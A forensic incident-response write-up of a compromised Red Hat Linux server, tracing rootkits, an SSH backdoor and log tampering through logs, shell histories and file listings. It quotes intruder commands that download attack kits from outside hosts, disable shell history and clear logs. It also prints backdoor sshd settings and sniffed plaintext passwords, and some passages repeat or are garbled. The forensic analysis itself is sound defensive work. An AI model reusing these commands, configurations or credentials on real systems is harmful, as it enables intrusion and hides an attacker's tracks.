[2004/06/29 09:43:14, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest!
[2004/06/29 09:43:16, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest!
[2004/06/29 09:43:19, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus916350472!
[2004/06/29 09:43:21, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus916350472!
[2004/06/29 11:33:19, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator!
[2004/06/29 11:33:21, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator!
[2004/06/29 11:33:24, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest!
[2004/06/29 11:33:26, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest!
[2004/06/29 11:33:29, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus398883526!
[2004/06/29 11:33:31, 0] passdb/pampass.c:smb_pam_passcheck(827)
smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus398883526!

/var/log/wtmp

Notice in the wtmp file output below user okray logged in, like we saw in the 'lastlog' output, but after about an hour all sessions had crashed. Below is an excerpt from the system administrator describing this situation when he arrived on scene:

"On Monday, 3 Aug at 9:30 after arriving I noticed system was hung. So I reboot it and let come up on its default kernel and it hung again. So I began trying the other kernels that are installed on it. After trying 3 different versions I was able to get it up in single user mode on the 4th one. I begin checking the message log file /var/log/message looking for SSH entries. Finding little.[.....]"

A big question comes to mind; The administrator got to the system on 3 Aug at 9:30 but the system was hung on 2 Aug at 14:38 - How come user okray did not notice, or report, a system crash? Are we in fact seeing user okray logged into the local console, or is user okray logged over a network and the system crashed to console? At any rate, it's strange that there were no kernel errors reported to /var/log/messages, or were those zero's out?
Let's take a look at the “last” command with a few options; -i to display remote IP's and -x to display run levels:

```
[root@LinuxForensics log]# last -f ./wtmp -i -x
reboot  system boot  0.0.0.0          Wed Aug  4 07:43         (253+12:47)
reboot  system boot  0.0.0.0          Mon Aug  2 15:36          (255+04:54)
okray  pts/1        0.0.0.0          Mon Aug  2 14:38 - crash  (00:57)
okray  pts/0        0.0.0.0          Mon Aug  2 14:38 - crash  (00:58)
okray  :0           104.62.1.64      Mon Aug  2 14:38 - crash  (00:58)
runlevel (to lvl 5) 0.0.0.0          Mon Aug  2 14:37 - 20:31 (255+05:53)
reboot  system boot  0.0.0.0          Mon Aug  2 14:37         (255+05:53)
shutdown system down 0.0.0.0          Mon Aug  2 14:31 - 20:31 (255+05:59)
runlevel (to lvl 6) 0.0.0.0          Mon Aug  2 14:31 - 14:31  (00:00)
reboot  system boot  0.0.0.0          Mon Aug  2 09:30          (05:00)
runlevel (to lvl 6) 0.0.0.0          Mon Aug  2 09:29 - 14:31  (05:01)
runlevel (to lvl 5) 0.0.0.0          Mon Aug  2 09:28 - 09:29  (00:01)
reboot  system boot  0.0.0.0          Mon Aug  2 09:28          (00:01)
runlevel (to lvl 6) 0.0.0.0          Mon Aug  2 08:10 - 09:28  (01:17)
okray  :0           104.62.1.64      Mon Aug  2 08:07 - 08:10  (00:03)
okray  :0           104.62.1.64      Mon Aug  2 07:57 - 08:06  (00:09)
```

# Default runlevel. The runlevels used by RHS are:
# 0 - halt (Do NOT set initdefault to this)
# 1 - Single user mode
# 2 - Multiuser, without NFS (The same as 3, if you do not have networking)
# 3 - Full multiuser mode
# 4 - unused
# 5 - X11
# 6 - reboot (Do NOT set initdefault to this)

Hmmm, what we see here are a lot of system reboots and X11 logins right from console (:0). User okray seems to be the one initiating all of this, then ultimately crashes the system. Sure seems like okray is sitting at the system and not remotely connected, but what explains the 104.62.1.64 – IANA Reserved, IP? I'm confused.

**History File Analysis**

We again reviewed what we knew about the incident:

- SSH might have been the entry point - We saw evidence that someone
was using a brute force script against SSH
- The Date of compromise could have been between 28 Jul – 01 Aug - This still seemed plausible
- The system was unresponsive - We saw this occurred on 2 Aug but still didn't know the reason why
- Roots password did not work - We have not seen evidence of that yet
- The NIC was in PROMISC mode - We saw indeed the NIC enters PROMISC mode during bootup, but we have not found out what caused this.
- An IRC server was installed - On 31 Jul the BitchX IRC was installed as an RPMpkg
- Key system binaries were owned by user “okray” instead of “root” - We have not analyzed this further as of yet.
- The system might have been infected with the linux.osf.8759 Trojan - We have not analyzed this further yet.
- We now have suspicions that the /var/log files have been modified in some way (missing entries, timestamps do not match, etc)

Our next step was to take a look at all of the history files to see if they could give us any answers (especially since reviewing the log files didn't really help us as much as we were hoping, in fact more questions were generated). I've pulled out the most interesting things within the history files, and highlighted the really significant things:

---------------------------------------------------------------------
User Okray .bash_history
---------------------------------------------------------------------

route -n-----------------> Odd for a normal user to worry about routes
lsmod -----------------> Even more strange to wonder about loaded modules
cd /etc/sysconfig/---------> Hmm
ls -l
ls
cd ../xinetd.d/----------> Wondering what's running?
ls -l
ssh root@5993.jag.af.mil
scp root@5993.jag.af.mil:/etc/xinetd.d/wu-ft* ./----------> Trying to get wu-ftp
ssh root@5993.jag.af.mil
/sbin/s --list
ps -ax-----------------> See what's running
/sbin/chkconfig --list
/sbin/chkconfig --list |grep w----------> Normal user maintaining rc.d?
less ipchains-----------------> Hmm, again
ps aux|grep smb
su ------------------------> Hey, why?
exit
ls
perl perlhw1.pl----------> Turns out these Perl entries are the real okray who's learning how to use Perl

---------------------------------------------------------------------
ls -l
cd perl
perl perlhw1.pl
exit
cd /etc
cd xinetd.d
ls
cat wu-ftpd
ps aux | grep wu-ftpd
cd ..
su -
exit
su -
exit
cd /proc
cat version
exit
history
exit
ifconfig
/sbin/ifconfig
ping x.x.59.12
ping x.x.56.8
ping x.x.56.8
ping x.x.59.254
cd /var/log/
ls
cd /var
ls
ls -l
dir
cd log
dir
tail messages
ps -ef|grep http
ps -ef
pine
su -
su -
passwd
passwd root
root??
su -
su -
tail messages
cd secure
tail secure
tail secure|grep 206.168.67.247

--------------------------> Back to suspicious stuff
--------------------------> Funny, I don't see wu-ftp in our listings?
--------------------------> Odd, why run ifconfig then run absolute path for ifconfig next? (trojan version?)
--------------------------> Okay, interesting
--------------------------> Are you filling up the logs?
--------------------------> Hmmmm, are we on a Windows box?
--------------------------> What's in here that's important, or what was in there??
--------------------------> Alright, why is user okray doing this to root??
--------------------------> That's our Columbian IP!
vi secure
vi secure
su -
su -
ps -ef
ssh -v
ssh -version
vi /etc/sysconfig/iptables
exit

---------------------------------------------------------------------
User Root .bash_history
---------------------------------------------------------------------
su
w
scp only@linuxhell.net:/home/arpa/only/haitateam.tgz
ls
dir
tar xzvf haitateam.tgz
rm -rf haitateam.tgz
cd haitateam/
ls
dir
./scan.sh 66.119

SSH

./scan.sh 66.181
man scp
ls -al
w
telnet localhost 22
pwd
cd
rm -rf haitateam/
ls
dir
rm -rf ssh

A quick call to the system administrator and user okray confirmed this activity
was not conducted by either one of them. We certainly had evidence that
something suspicious, and malicious was going on - And more questions to
answer.

File System Analysis
Finding Odd Or Hidden Directories and Files

Basically, I used fours types of 'find' commands to find hidden directories, files, and both with special characters. After I applied this to each partition image I was disappointed to see little results, I expected to find a bunch of things. However, it turned out that the hidden directory under /var was a pretty big discovery for us. It was this step that everything changed, a rootkit was discovered.

```
find . -name ".." -print -xdev
find . -name ".*" -type d -printf "%Tc %k %h/%f\n"
find . -name ".*" -type f -printf "%Tc %k %h/%f\n"
find / -name ".*" -print -xdev | cat -v
```

/root

Here's where we see the IRC server BitchX is installed...Not a big deal, move on to /var.

```
```

/var

```
Sun 01 Aug 2004 05:21:17 PM CDT 4 ./lib/games/.src
```

We see a hidden directory called .src, oddly placed under the games directory. Under this are two subdirectories called 'skit' and 'ssk', written to on 1 Aug and 27 Jun 2004 respectively.

```
var/lib/games/.src/skit
```

Here's what we see under this directory;

```
-rwxr-xr-x 1 root bin 4439 Jan 24 2004 findkit --------------> Just like it sounds, finds 28 different kinds of rootkits. Also looks for passwords and devices piping to dev/null

drwxr-xr-x 2 root root 4096 Aug 1 2004 log --------------> MIG logcleaner by no1 (greyhats.za.net). Let's you remove, add, modify logs from utmp, wtmp, utmpx, wtmpx, lastlog files.

-rw-r--r-- 1 root bin 89600 Jan 24 2004 log.tar --------------> And here's the tar for it
```
Nice, now we can see where this thing installs. Below is what it's suppose to do, however there was no "man" directory under /usr, so either it was deleted or the intruder modified the conf file.

```
mv ssh_host_key /usr/man/man1/sys
mv sshd_config /usr/man/man1/sys
mv log.tar /usr/man/man1/sys
mv ssh /usr/man/man1/sys
mv findkit /usr/man/man1/sys
mv ssh-keygen /usr/man/man1/sys
mv ssh_host_key /usr/man/man1/sys
mv sshd /usr/bin/inetd
touch /usr/man/man1/sys/lib.so
chmod 666 /usr/man/man1/sys/lib.so
```

Pulled out the significant entries for this file;

```
Port 3913
ListenAddress 0.0.0.0
PermitRootLogin yes
```

```
-rw-r--r-- 1 root     bin         525 Jan 24  2004 sshd_config
```

The entire install log. Key interest for me was where everything is suppose to be installed, although the subdirectories no longer exist: `config.log /usr/man/man1/sys/rk/remote/raw/ssk/configure` (Notice 'rk', rootkit?). Further analysis showed this was very similar to the 'shKIT' backdoor.

```
drwxr-xr-x 2 okray okray     4096 Apr 27  2004 shit
```

Sub-directory under ssk. There is another config file in this directory called "sshd2_config", it's this file that's really being called within the config.log so it's safe to assume these were the install parameters used. Notice user okray owns this;

```
-rw-r--r-- 1 jmel-proxy jmel-proxy       45 Jun 23  2004 ssk.tar.gz
```

And here we have the entire tar file for analysis. Makes our job very easy.

```
Port 51980
ListenAddress 0.0.0.0
Ciphers AnyStd
PermitRootLogin yes
```
UserConfigDirectory  "%D/.ssh2"
UserKnownHosts yes

### Setuid and Setgid Files

We next ran another "find" command to pull all files allowing normal users to assume root privilege. We should have expected to see some evidence of this, especially since user okray seems to either own or have the ability to modify files normally under roots control. However, we only had ten returns and all turned up normal. It would appear that instead of setting SUID to files, the intruder just changed the ownership of files instead.

```
find / -perm -2000 -o -perm -4000 -print
```

### INODE Searches

This is my favorite search to conduct on analysis, and probably the easiest command to issue to find suspicious files. Since we still didn't have an initial date of compromise, I decided to retrieve all inode changes after the date of system installation. I used /root/install.log (another file that can be used to find out when a system was installed) as my starting point. I then took this output and piped it through "ls -li" for each entry and analyzed those results. My last check was to search through all inode value for entries with root as just a user or a group, not both.

```
find . -cnewer /mnt/04-34/root/tmp/install.log -print0 | xargs -0 ls -lncad \
ls -li | sort| uniq| sort
```

#### /dev

```
---------------------------------------------
/dev
---------------------------------------------
30725 srwx------ 1 root root 0 Aug 2 2004 gpmctl
30726 crw-rw---- 1 root disk 27, 20 Aug 30 2002 nzqft0
30736 -rw-r--r-- 1 root root 1041 Jul 28 2004 srd0
30747 srwxr-xr-x 1 root root 0 Aug 4 2004 log
30754 ---------- 1 root root 0 Jul 28 2004 hdx1
30770 --------- 1 root root 0 Jul 28 2004 hdx2
30896 crw------- 1 okray root 5, 1 Aug 2 2004 console
```

I noticed these files grouped together, and thought how strange it was for user okray to own 'console'. Next, I issued a 'file' command and noticed the "srd0" file was ASCII text, very strange for a /dev file -- Man, is this really familiar (aka T0rn variant, but normally this is a directory not an ASCII text file). Here's its output:

```
jtojycKdL4DJsnej1iO3uLtc35gV3MvdoSae3F66+LHobTIPUCEeEzdxgyNos4lvejtbRNdAMxP/d7
NhBeFselsPXsoloDE5z1eZ2JQtsMAQROfisQ9H71saH7riZnhsFEM+RvJlalbLfiQzIT796HZC
HbJRHzwuwU0BoEZWZ66Kw9fmiWgM7nPV7ZmNC2wssU7xca7n/xqiRJgqZylDy9itN4y/xwl3i2DR
UMJHtbfpL8u0zFWEOQd4aHHRV8MZ6Kw9fmiWgM7nPV7ZmNC2wwJK0v676SnOtiJUGMXEm
```
This looks very familiar, like base-64 encoding. or maybe, an ssh key? Wait a minute, I should check the ssh rootkit keys to see if we have a match under the var/lib/games/.src/ssk directory:

```
[root@LinuxForensics dev]# md5 srd0
2f84ca585f00c026165cd9e52517 srd0

[root@LinuxForensics shit]# md5 hostkey
62d81589f659f3a7085949e03de64c0f hostkey

[root@LinuxForensics shit]# md5 hostkey.pub
d8f5abff5d95407c3428b83e76e6a hostkey.pub

[root@LinuxForensics shit]# cd ..../
[root@LinuxForensics .src]# cd skit

[root@LinuxForensics skit]# md5 ssh_host_key
4369a0134fde580fc007f51528280c ssh_host_key
```

None of these matched, but further analysis did show srd0' was an SSH key for someone.

```
/bin
```

Here we see how easy it is to spot files out of place, these are some of the key system binaries that 'okray' owns instead of root.

```
3530 -rwxr-xr-x | okray okray | 54152 Aug 6 2002 netstat
3531 -rwxr-xr-x | okray okray | 62920 Aug 12 2002 ps
3542 -rwxr-xr-x | okray okray | 13725 Aug 30 2002 login
38477 -rwxr-xr-x | root root | 77285 Jun 23 2002 ed
```

```
/sbin
```

Again we see some key binaries owned by okray. Notice that although we are in a different, the inodes between the binaries in /bin and /sbin are pretty much sequential (and all owned by okray). Now, notice how the timestamps kind of bounce around, a good look at the MAC's of these inode groupings
should give us when these binaries were modified... If this is a rootkit trojanizing these files, is it using 'mv' to copy them so it won't change the timestamps?

3529 -rwxr-xr-x 1 okray okray 31504 Aug 6 2002 ifconfig
3533 -rwxr-xr-x 1 okray okray 26496 Jun 23 2002 syslogd

/tmp

I didn't really see anything malicious with these directories, but I noticed their inodes happened right before the /bin and /sbin binaries are modified. Within these directories are socket files that held a network session at one point --- hmmm.

3520 drwx------ 2 okray okray 4096 Feb 9 2004 ssh-XXyvTtxU
3528 drwx------ 2 okray okray 4096 Aug 2 2004 ssh-XXMdfvOW

/etc/rpm

Here is where my check for files without root as both user and group came in handy, otherwise I think I would have missed all of this. What we see are the OSF Trojan clean files, last accessed on 31 Jul. The rest of the files may or may not be related but their inodes are all grouped together -- can you tell what's going on? To me it looks like someone is running this remotely.

92931 drwxr-xr-x 2 1005 1005 4096 Jul 31 2004 clean-osf
         -rwxr-xr-x 1 root root 18857 Jul 31 2004 clean-osf.8759-ps
93317 -rw-r--r-- 1 1005 1005 13342 Nov 22 2003 clean-osf.8759.c
93319 -rw-r--r-- 1 1005 1005 79 Dec 6 2002 Makefile
92874 srw------- 1 okray okray 0 Aug 2 2004 kdeinit-:0
92875 -rw-rw-r-- 1 okray okray 39 Aug 2 2004 KSMserver__0
92876 srwxrwxr-x 1 okray okray 0 Aug 2 2004 klauncherKTZGa.slave-socket
92877 drwx------ 2 okray okray 4096 Sep 11 2003 ssh-XXgYZxRu
92887 srwxrwxr-x 1 okray okray 0 Sep 11 2003 agent.9529
92930 drwx------ 2 okray okray 4096 Aug 2 2004 ksocket-lmokray
92932 drwx------ 2 okray okray 4096 Feb 6 2004 ssh-XXdH99Dv
92933 srwxrwxr-x 1 okray okray 0 Feb 6 2004 agent.28781
92934 srwxrwxr-x 1 okray okray 0 Sep 11 2003 klauncherz99lec.slave-socket
93320 srwxrwxr-x 1 okray okray 0 Feb 6 2004 klauncherJXIWi1a.slave-socket
93321 srwxrwxr-x 1 okray okray 0 Feb 9 2004 klaunchernYlQcc.slave-socket
93324 -rw-r--r-- 1 okray okray 43 Jan 6 2002 lidps1.so
93567 drwx------ 2 okray okray 4096 Aug 2 2004 kde-lmokray
93571 -rw-rw-r-- 1 okray okray 489111 Aug 2 2004 ksycoca
93578 -rw-rw-r-- 1 okray okray 516 Aug 2 2004 ksycocastamp

/usr/lib/games

We revisit our SSH backdoor...
drwxr-xr-x  4 0 0 4096 Aug 1 2004 ./lib/games/.src
drwxr-xr-x  9 500 500 4096 Aug 1 2004 ./lib/games/.src/ssk
drwxr-xr-x 12 500 500 4096 Aug 1 2004 ./lib/games/.src/ssk/lib
drwxr-xr-x  3 500 500 4096 Aug 1 2004 ./lib/games/.src/ssk/lib/sshpgp

--------------------------------------------------------------------
/usr/sbin
--------------------------------------------------------------------

There are two things I want to point out about these entries. Notice 'lsof' nested in-between legitimate files logrotate and logwatch. Looks like lsof just had its properties changed to user okray, and not directly written to.

```
129853 -rwxr-xr-x  1 root root  39045 Jun  23 2002 logrotate
129854 -rwxr-xr-x  1 okray okray  82628 Jun  23 2002 lsof
129855 lrwxrwxrwx  1 root root  
```

Second, all of the binaries in /sbin had inodes between 12000 to 13000, then all of a sudden there is this file called 'zic' with an inode not even close. Notice the timestamp, looks like it could be the original 'zic' binary used for time conversions -- but this is a rootkit also;

```
33578 -rwxr-xr-x  1 root root  51412 Apr  16 2003 zic
```

We spent quite a bit of time analyzing this binary, due in large part because it crashed 3 of our test systems. In fact, our test systems could no longer boot into default kernels anymore, just like our victim system!

```
-------->sub  804CAB4
    |  exit
    |
-------------------------------> 14 additional sub calls (where the trojans come in)
    |
    |
    ...

-------->sub  804CA4Q
    mv ebx, (esp + arg4)
    mv dword ptr (ebx), 1337C0DE <-------- this is where it was crashing when it wrote "leetcode" to memory -- ha, ha....
```

Turns out we needed RedHat 7.1, Kernel 2.4.2 for this to work perfectly --- strange. This file is really a variant of the 'mYrk' rootkit (presumably meaning My Rootkit). It's capable of hiding processes, files, network sniffing, modifying firewall rule-sets, and key logging. Our analysis within IDA-Pro (reverse-engineering and debugger) showed the system binaries owned by okray were identified within here as trojanized version.. Further analysis showed it has many similarities between the t0rnv8 rootkit. It's main feature was its ability to have a port-less backdoor (it would listen for a trigger packet promiscuously then wake up)... this helps hide it from lsof, nmap, etc....
The rootkit also installed a directory under /usr/lib/ix86/logz (Yeah, it's buried) to maintain its clean files and sniffer file. We will get to these shortly.

So, how many rootkits do we have now, so far I count three....

--------------------------------------------------------------------
/usr/src/redhat/BUILD
--------------------------------------------------------------------

The directory psmisc contains a collection of known tools to read, kill, and map processes. The inodes of the tools inside this directory are sequential to many of the malicious files we have already analyzed, so it's a good bet the intruder placed these on the system.

359062 drwxr-sr-x  5 root root  4096 Jul 31  2004 psmisc-21.2
--------------------------------------------------------------------
/usr/lib/ix86
--------------------------------------------------------------------

Here is the directory the mYrk rootkit installs. Aside from IDA-Pro showing us where this was our search for files not owned by root as both user and group paid off--- Notice the group ID of 6666, who is this because it's not in victim's passwd file? It's assumed this ID came from a tar file that retained original permissions.

Under the ix86 there is a subdirectory called 'logz' containing the keysniffer file (pass.log) and a cleaner file called 'wclean'.

213496 drwx------  3 root  6666  4096 Jul 30  2004 ix86
drwx------  2 root root  4096 Jul 30  2004 logz
-rw-r--r--  1 root root 24473 Aug  2  2004 pass.log
-rwxr-xr-x  1 root root 18799 Jul 30  2004 wclean

The wclean file is another utmp, wtmp, lastlog and generic string editor. This cleaner, along with a script under /usr/bin called 'v' (we see this later) were used to attempt to clean just about every log file. Here's what it can do;

%s -L logfile [string / -t nr]
  -n nr   only delete the latest nr matching entries
  -t nr   clean last nr lines from filelog cleanser
  -x      clean everything u/w/l
  -h host zap this host
  -i ip   zap this ip
  -a      adjust lastlog
  -b      clean utmp
  -w path path to wtmp
  -l path path to lastlog
  -L path path to ascii file

Below are the significant entries within the pass.log file. I've stated this was
a keysniffer before but that’s a little misleading. In-depth analysis of the mYrk rootkit showed pass.log is the output of a terminal sniffer, meaning whatever process grabs a pts terminal will be sniffed (pretty nice). So, this file was quite large even though it was only a few days old. This output helped us a lot with what files we wanted to recover later on in our investigation. I found it very odd though that the intruder allowed all of their actions to be logged. My suspicions were the intruder never got around to cleaning their tracks completely because the system became unresponsive, that would explain why we have so much evidence without even pulling the deleted data yet;

```
pts0: 10227 (0): -bash: BitchX
pts0: 10250 (0): BitchX: ^C^Z/exit    --------------------------> Ah, freaking out, it works, it works!
pts0: 10250 (0): BitchX: /quit
pts0: 10250 (0): BitchX: /quit
pts0: 10227 (0): -bash: kill -9 $$ ---------------------------------> Odd way to kill a terminal, still panicking?
pts0: 10263 (0): -bash: ls
pts0: 10263 (0): -bash: ssh -l admin x.x.55.126 q1w2e3r4 --------------->
pts0: 10250 (0): BitchX: /quit
pts0: 10250 (0): BitchX: /quit
pts0: 10227 (0): -bash: kill -9 $$ --------------------------------> Nice root password. This was actually the original root password, pretty easy to brute force. Turns out the intruder changed roots password later on.
```

```
pts0: 10291 (0): -bash: wget mirror.trouble-free.net/killall/skdetect --------------->
pts0: 10291 (0): -bash: unset HISTFILE --------------->
pts0: 10291 (0): -bash: wget egensolutions.com/skdetect --------------->
pts0: 10505 (0): ftp 66.218.91.76: egensolutions.com ------------------>
pts0: 10505 (0): ftp 66.218.91.76: get clean.tar.gz --------------->
pts0: 10505 (0): ftp 66.218.91.76: bye
pts0: 10291 (0): -bash: chmod +x skdetect
pts0: 10291 (0): -bash: skdetect ---------------------------------> Running it
pts0: 10291 (0): -bash: rm -rf skdetect
pts0: 10291 (0): -bash: tar xfvz clean.tar.gz ------------------> Un tar the OSF cleaner
pts0: 10291 (0): -bash: cd clean-osf/
pts0: 10291 (0): -bash: ./Umake ------------------------> Make it
pts0: 10291 (0): -bash: pstree
pts0: 10291 (0): -bash: strings /usr/bin/atd
pts0: 10291 (0): -bash: rpm -q --whatprovides /usr/bin/atd
pts0: 10291 (0): -bash: killall -9 /usr/bin/atd --------------->
pts0: 10291 (0): -bash: rm -rf /usr/bin/atd ----------------)---> Maybe we will recover this
pts0: 10291 (0): -bash: ^Cls -al /usr/sbin/.fbi
pts0: 10291 (0): -bash: cd /usr/sbin/.fbi
```

A keysniffer before but that’s a little misleading. In-depth analysis of the mYrk rootkit showed pass.log is the output of a terminal sniffer, meaning whatever process grabs a pts terminal will be sniffed (pretty nice). So, this file was quite large even though it was only a few days old. This output helped us a lot with what files we wanted to recover later on in our investigation. I found it very odd though that the intruder allowed all of their actions to be logged. My suspicions were the intruder never got around to cleaning their tracks completely because the system became unresponsive, that would explain why we have so much evidence without even pulling the deleted data yet;
pts0: 10291 (0): -bash: cd alarmd
pts0: 10291 (0): -bash: ls
pts0: 10291 (0): -bash: cat mech.set
pts0: 10291 (0): -bash: cd ..
pts0: 10291 (0): -bash: rm -rf *

pts0: 10291 (0): -bash: cd ..
pts0: 10291 (0): -bash: rm -rf .fbi
pts0: 10291 (0): -bash: pstree
pts0: 10291 (0): -bash: cd /etc/rc.d
pts0: 10291 (0): -bash: ls -al
pts0: 10291 (0): -bash: cat rc.local
pts0: 10291 (0): -bash: cat rc.sysinit
pts0: 10291 (0): -bash: rpm -UVH vh psmisc-21.2-4.src.rpm
pts0: 10291 (0): -bash: rm -rf psmisc-21.2-4.src.rpm

pts0: 10291 (0): -bash: chattr -iau /usr/sbin/xntps
pts0: 10291 (0): -bash: whereis xntps
pts0: 10291 (0): -bash: locate xntps
pts0: 10291 (0): -bash: lastlog
pts0: 10291 (0): -bash: last root
pts0: 10291 (0): -bash: w
pts0: 10291 (0): -bash: ./c^I^Ccd clean-osf
pts0: 10291 (0): -bash: chattr -iau /bin/ls
pts0: 10291 (0): -bash: rm -rf /bin/ls
pts0: 10291 (0): -bash: wget typeuid.org/ssh.tar.bz2
pts0: 10291 (0): -bash: bunz^I ssh.tar.bz2
pts0: 10291 (0): -bash: tar xfv ssh.tar
pts0: 10291 (0): -bash: rpm -q --qhatprovides /bin/ls
pts0: 10291 (0): -bash: rpm -q --whatprovides /bin/ls
pts0: 10291 (0): -bash: history | grep wget
pts0: 10291 (0): -bash: history
pts1: 12696 (0): -bash: cat /root/.ssh/known_hosts
pts1: 12696 (0): -bash: rm -rf /root/.ssh/known_hosts
pts1: 12696 (0): -bash: vi /root/.ssh/known_hosts2

pts0: 10291 (0): -bash: rpm -UVH vh psmisc-21.2-4.src.rpm
pts0: 10291 (0): -bash: rm -rf psmisc-21.2-4.src.rpm

pts0: 10291 (0): -bash: chattr -iau /usr/sbin/xntps
pts0: 10291 (0): -bash: whereis xntps
pts0: 10291 (0): -bash: locate xntps
pts0: 10291 (0): -bash: lastlog
pts0: 10291 (0): -bash: last root
pts0: 10291 (0): -bash: w
pts0: 10291 (0): -bash: ./c^I^Ccd clean-osf
pts0: 10291 (0): -bash: chattr -iau /bin/ls
pts0: 10291 (0): -bash: rm -rf /bin/ls
pts0: 10291 (0): -bash: wget typeuid.org/ssh.tar.bz2
pts0: 10291 (0): -bash: bunz^I ssh.tar.bz2
pts0: 10291 (0): -bash: tar xfv ssh.tar
pts0: 10291 (0): -bash: rpm -q --qhatprovides /bin/ls
pts0: 10291 (0): -bash: rpm -q --whatprovides /bin/ls
pts0: 10291 (0): -bash: history | grep wget
pts0: 10291 (0): -bash: history
pts1: 12696 (0): -bash: cat /root/.ssh/known_hosts
pts1: 12696 (0): -bash: rm -rf /root/.ssh/known_hosts

actualy dumps the VI output too, we saw intruder paste in his key that used to hide in
/dev ---
pts0: 10291 (0): -bash: ifco[^I] | grep inet
pts0: 10291 (0): -bash: ifconfig
pts0: 12802 (0): -bash: uname -a ------------------------> Weird, normally this is one of the
first commands
pts0: 12904 (0): -bash: cat /etc/hosts
pts0: 12955 (0): ftp 66.218.91.77: egensolutions.com
pts0: 12955 (0): ftp 66.218.91.77: egen1234
pts0: 12955 (0): ftp 66.218.91.77: hash
pts0: 12955 (0): ftp 66.218.91.77: get v --------------------------> Turns out this is yet
another cleaning script, this time to modify the secure, xferlog, mailog, mail, and httpd
access logs
pts0: 12904 (0): -bash: chmod +x v
pts0: 12904 (0): -bash: mv v /usr/bin
pts0: 13001 (0): bash: scp only@linuxhellunset HISTFILE
--------------------------> Cool
pts0: 13001 (0): bash: scp only@linuxhell.net:/home/arpa/only/mail.tar.gz .
pts0: 13001 (0): bash: tar xzf mail.tar.gz
pts0: 13001 (0): bash: rm -rf mail.tar.gz mail.tar.gz
--------------------------> More stuff to find
pts1: 13469 (0): -bash: mkdir -p /var/lib/games/.src
--------------------------> Here's the
SSH rootkit dir
pts1: 13469 (0): -bash: cd /var/lib/games/.src
pts1: 13469 (0): -bash: wget
pts1: 13469 (0): -bash: wget addr12.addr.com/~caver/skit..tar.tar.gz
--------------------------> The RK tar file
pts1: 13469 (0): -bash: tar xf sk[^I]
pts1: 13469 (0): -bash: rm -rf sk[^I].[^I]
--------------------------> We don't really need the tar, we
have
the whole dir
pts0: 13441 (0): bash: scp only@linuxhell.net:/home/arpa/only/haitateam.tgz .
--------------------------ting everything

SSH brute forcer. Probably the exact same tool intruder used to get into this system.
pts0: 13441 (0): bash: tar xzvf haitateam.tgz
pts0: 13441 (0): bash: rm -rf haitateam.tgz
pts0: 13441 (0): bash: .^H/scan.sh 66.119
--------------------------> scan.sh is part of
haitateam.tgz, intruder is looking for other victims...
pts1: 13469 (0): -bash: cd /var/lib/games/.src
pts1: 13469 (0): -bash: scp kan3@69.31.70.2:ssl.tar.gz .
--------------------------> Alright, step 1
for backdoor
pts1: 13469 (0): -bash: tar xzf ssl[^I];rm -rf ssl[^I]
pts1: 13469 (0): -bash: cd ssk/ap^Iss[^I]
pts1: 13469 (0): -bash: .ssh^d2
--------------------------> And there we have it, ssh2
backdoor
pts1: 13469 (0): -bash: mv ssh2 /etc/ssh
--------------------------> Hey, why not?
pts1: 13469 (0): -bash: mv /etc/ssh2/ssh_host_key /etc/ssh2/hostkey;mv
/etc/ssh2/ssh_host_key.pub /etc/ssh2/hostkey.pub
--------------------------> We begin
pts1: 13469 (0): -bash: chattr +aui /usr/sbin/sshd
pts1: 13469 (0): -bash: lsattr /usr/sbin/sshd
pts0: 13441 (0): bash: telnet localhost 22  
pts0: 13441 (0): bash: rm -rf ssh  
pts0: 13441 (0): bash: telnet localhost 22  
pts0: 13441 (0): bash: telnet fileserver1.ev1servers.net 22  
pts0: 13441 (0): bash: telnet 216.127.76.27 22
pts0: 13441 (0): bash: telnet 216.127.76.27 22

tty7: -1 (-1): :  

Cool, he's in without supplying any credentials

Analysis of /etc

I've already dipped in and out of this directory throughout the paper so I won't go into too much detail. My "find" and inode searches covered a lot of this. But as a general rule, I decided to analyze this directory into two parts, first look at directories then look at files.

Below are the directories (aside from rc.d which is a separate section) I analyzed. Again we can see the only pertinent things that stand out are details we already covered;

```
/cron.*
/proute2
/local
/log.d
/mail
/profile.d
/rpm
```

drwxr-xr-x 2 1005 1005  4096 Jul 31 08:23 clean-osf
-rw-r--r-- 1 root root  13658 Jul 31 08:22 clean.tar.gz

```
/ssh2
```

drwxr-xr-x 2 root root  4096 Aug  1 17:24 ssh2  

The intruder had a backdoor SSH rootkit that they named ssh2, then did a 'mv' to replace the original SSH binaries, killed xinet and restarted. Intruder however, forgot to do 'rm -rf ssh2' for this directory so there were footprints of a config file and keys.

```
/security
/skel
/xinet.d
```

Below are the regular files under /etc I analyzed, much of this we have already described as well;

```
/crontab  
/group  
/hosts*
/initd  
/localtime
/password  
```

All correctly point to /etc/cron* and everything in there looked normal
User okray is the first and only normal user:    okray:x:500:
Looks normal, processes rc.d fine, correct run levels
Everything looked fine in here, no active accounts other than root,
Start-up Files and Processes

All of the rc.d directories appeared to be running normal and standard start-up scripts. The only questionable script was the main boot script “rc.sysinit”. I was a little suspicious with this one only because it had been written to on 28 Jul 2004. I went through the entire darn thing and it all looked legitimate, except a few lines up from the bottom I saw this entry;

```
# Xntps (NTPv3 daemon) startup...
/usr/sbin/xntps -q
```

Things are really starting to point in the direction of yet another variant of the Tt0rn rootkit. I think I'm done analyzing things now since it seems kind of pointless, I'll just run chkrootkit later on to confirm everything rather than “strings”, “strace” “ida-pro”, etc.....

Timeline Analysis

Timeline of Deleted But Intact INODES

